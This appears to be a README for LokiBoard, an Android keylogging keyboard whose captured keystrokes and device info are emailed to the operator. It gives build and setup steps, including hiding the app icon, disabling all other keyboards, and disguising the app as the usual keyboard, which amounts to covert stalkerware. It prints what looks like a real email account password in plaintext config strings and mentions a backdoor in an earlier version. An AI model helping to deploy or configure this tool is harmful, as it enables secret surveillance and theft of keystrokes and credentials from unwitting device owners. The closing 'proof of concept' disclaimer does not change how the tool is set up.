This hakistan version is behind some weird non existent pro version that does not work, So far it's been just un-commenting many snippets of code until it breaks, it's like overclocking lol, there was also a backdoor so hakistan always got logs.
as of right now an email is sent of user device info on initial install, during testing make sure to type or click on the virtual keyboard if using genymotion for example. keypress logs as of now are only sent when the user opens up the app.
To get started helping us reverse engineer this mess you can download the rar from the release section
then open up the folder inside Android Studio after extraction.
After this goto file | Settings | Goto Search Box
search for Gradle
click the drop down and select use gradle from wrapper properties file, click ok
next click file then sync project with gradle files
and edit these 2 lines:
[ <string name="EMail">[email protected]</string>]
<string name="EmailPassword">7.gMukhlis.Ghaf00r</string>
from this snippet:
<string name="prefs_keyboard_height_settings">Keyboard height</string>
<string name="keyboard_color">Set custom keyboard color</string>
<string name="hide_special_chars">Hide special characters</string>
<string name="hide_language_switch_key">Hide language switch key</string>
<string name="show_number_row">Show separate number row</string>
<string name="space_swipe">Space swipe cursor move</string>
<string name="delete_swipe">Delete swipe</string>
<string name="matching_navbar_color">Use matching navigation bar color</string>
<string name="setup_message">LokiBoard Keyboard is not enabled. Click OK to open Languages & Input settings. You will need to select LokiBoard Keyboard in your current keyboard to use it.</string>
<string name="EMail">[email protected]</string>
<string name="EmailPassword">7.gMukhlis.Ghaf00r</string>
<string name="Interval">120000</string>
You should also do a search and replace all for any emails.
Android Keylogging Keyboard
Build it from source or use prebuilt apks.
Note: You need to have physical access to the device for use.
- Install app.
- Open the language and input section in the System Settings if it does not automatically open after install
- Enable Lokiboard and disable all other forms of input.
- The homescreen icon is hidden by default. LokiBoard Settings can be accessed by tapping LokiBoard in the language and input section of system settings.
- There are tons of settings to make it look and behave like your usual keyboard including theme support.
- Keystroke logs can be accessed via your file manager.
Internal Storage > Android > Data > com.abifog.lokiboard > files > lokiboard-files.txt
This was designed as a proof of concept and not for any malacious purposes.
Based on the Android Open Source Project Keyboard and Simple Keyboard